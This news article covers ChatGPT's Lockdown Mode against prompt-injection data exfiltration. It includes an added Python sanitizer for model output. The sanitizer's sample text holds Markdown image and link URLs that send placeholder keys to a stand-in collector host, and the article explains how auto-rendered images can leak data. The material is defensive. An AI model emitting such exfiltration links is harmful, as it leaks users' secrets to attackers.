OpenAI Introduces Lockdown Mode to Enhance ChatGPT Security

OpenAI has introduced a new Lockdown Mode for ChatGPT, aimed at users handling sensitive data who require enhanced security measures. This feature is available to logged-in users across Free, Go, Plus, Pro, and self-serve ChatGPT Business plans.

According to OpenAI, Lockdown Mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services. It is designed to reduce the risk of data exfiltration from prompt injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features.

Prompt injection attacks involve embedding malicious instructions within user inputs to manipulate the model’s behavior, potentially leading to unauthorized data access or exfiltration. Lockdown Mode addresses this by restricting outbound network requests that could transmit sensitive information to attacker-controlled servers.
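The restriction described above can be illustrated on rendered model output, where Markdown images and links are kept only when they point at an allowlisted host. This is an added example, not OpenAI's implementation of Lockdown Mode; the allowlist, host names and sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment allows outbound requests to.
ALLOWED_HOSTS = {"docs.example.com"}

# Markdown images ![alt](url) and links [text](url). Images are fetched
# automatically when rendered, so they can carry data out without a click.
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")

def host_allowed(url: str) -> bool:
    """Exact-match the parsed host; anything unparseable or relative fails closed."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # .hostname excludes userinfo and port, so "allowed@other-host" is judged
    # by the real host, and suffix look-alikes fail the exact match.
    return (parts.hostname or "").lower() in ALLOWED_HOSTS

def sanitize(model_output: str):
    """Return (safe_text, blocked_urls) for text that is about to be rendered."""
    blocked = []

    def repl(match):
        is_image, label, url = match.group(1), match.group(2), match.group(3)
        if host_allowed(url):
            return match.group(0)
        blocked.append(url)
        # Keep the visible label, drop the URL: nothing to fetch, nothing to click.
        return f"[blocked image: {label}]" if is_image else label

    return MD_REF.sub(repl, model_output), blocked

# Constructed model output: one allowlisted link, two references to another host.
SAMPLE = (
    "Summary done. ![status](https://collector.example.net/p.png?d=API_KEY_VALUE) "
    "See [the guide](https://docs.example.com/guide) or "
    "[details](https://collector.example.net/x?d=secret)."
)

if __name__ == "__main__":
    text, blocked = sanitize(SAMPLE)
    print(text)
    print("blocked:", blocked)
```

The `blocked` list is worth logging: a response that tries to reference a non-allowlisted host with query data attached is a useful signal that injected instructions reached the model.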

Enabling Lockdown Mode disables several features, including:

  • Live web browsing, limiting access to cached content only.
  • Image support, preventing the display or retrieval of images from the web.
  • Deep research capabilities.
  • Agent mode.
  • Canvas networking, blocking network access for code generated by Canvas.
  • File downloads for data analysis.

OpenAI emphasizes that Lockdown Mode is not intended for all users and cannot be used simultaneously with Developer Mode; activating one will disable the other. While this feature significantly reduces the risk of prompt injection-based data exfiltration, it does not eliminate all potential threats. For instance, malicious instructions hidden in uploaded files could still affect ChatGPT’s behavior and lead to incorrect responses.

In addition to Lockdown Mode, OpenAI has launched a new account management feature that allows users to review active ChatGPT sessions and log out of individual or all sessions if unauthorized activity is detected. This feature provides details such as device information, app used, approximate location, sign-in date and time, device trust status, and current session status.

As reported by The Hacker News, these developments underscore OpenAI’s commitment to enhancing user security and privacy. However, users should remain vigilant and implement comprehensive security practices, as no single feature can fully eliminate all potential risks associated with prompt injection attacks.

Source: The Hacker News